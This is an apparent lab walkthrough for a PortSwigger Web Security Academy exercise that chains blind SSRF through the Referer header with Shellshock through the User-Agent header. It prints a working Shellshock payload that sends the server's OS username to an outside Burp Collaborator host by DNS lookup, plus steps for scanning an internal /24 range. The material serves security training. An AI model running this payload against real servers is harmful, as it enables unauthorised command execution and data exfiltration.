[**Blind SSRF with Shellshock Exploitation**](https://portswigger.net/web-security/ssrf/blind/lab-shellshock-exploitation) lab, which combines two serious vulnerabilities: **Server-Side Request Forgery (SSRF)** and **Shellshock (CVE-2014-6271)**. ##### Step-by-Step Exploitation Plan ##### 1. **Recon: Identify SSRF Trigger** - Visit any product page (e.g., `/product?productId=1`) - In Burp, note that it causes the server to send a request to the URL in the `Referer` header - That outbound request includes the `User-Agent` you control ➡️ **This gives you two key vectors:** - SSRF via `Referer` - Shellshock via `User-Agent` --- ##### 2. **Install Collaborator Everywhere** - Go to Burp → BApp Store → Install **Collaborator Everywhere** - Set **target scope** to include the lab domain - It will automatically inject Burp Collaborator payloads into headers, making discovery easy ![[CleanShot 2025-05-03 at 12.52.20.png]] --- ##### 3. **Generate Collaborator Payload** Go to the **Burp Collaborator** tab and click `Copy to clipboard` — you'll get something like: ``` v41dugnd8u9on3g7z1lihjz4dsrtx4.burpcollaborator.net ``` --- ##### 4. **Build Shellshock Payload** Use this classic Shellshock syntax: ##### 🧨 Shellshock Payload (with Collaborator DNS exfil) ```bash () { :; }; /usr/bin/nslookup $(whoami).v41dugnd8u9on3g7z1lihjz4dsrtx4.burpcollaborator.net ``` - `() { :; };` triggers the Bash function definition bug - `nslookup $(whoami)...` causes the internal server to leak the OS user via a DNS query to Collaborator --- ##### 5. **Intruder Setup: Blind SSRF Range Scan** 1. Send a **product page** request to **Burp Intruder** 2. Replace `User-Agent` with your Shellshock payload 3. Replace `Referer` with: ``` http://192.168.0.1:8080 ``` Then highlight `1` (last octet) and click **Add §** ![[CleanShot 2025-05-03 at 12.55.25.png]] #### Payloads tab: - Payload type: `Numbers` - From: `1` - To: `255` - Step: `1` ✅ This will scan the full internal `/24` range for a vulnerable service. ![[CleanShot 2025-05-03 at 12.56.37.png]] --- ##### 6. **Start Attack & Monitor Collaborator** - Run the attack - Go to **Burp Collaborator** and click `Poll now` - Watch for **DNS interactions** like: ``` username.v41dugnd8u9on3g7z1lihjz4dsrtx4.burpcollaborator.net ``` 🎯 The subdomain prefix (`username`) reveals the **OS user**. ![[CleanShot 2025-05-03 at 12.57.03.png]]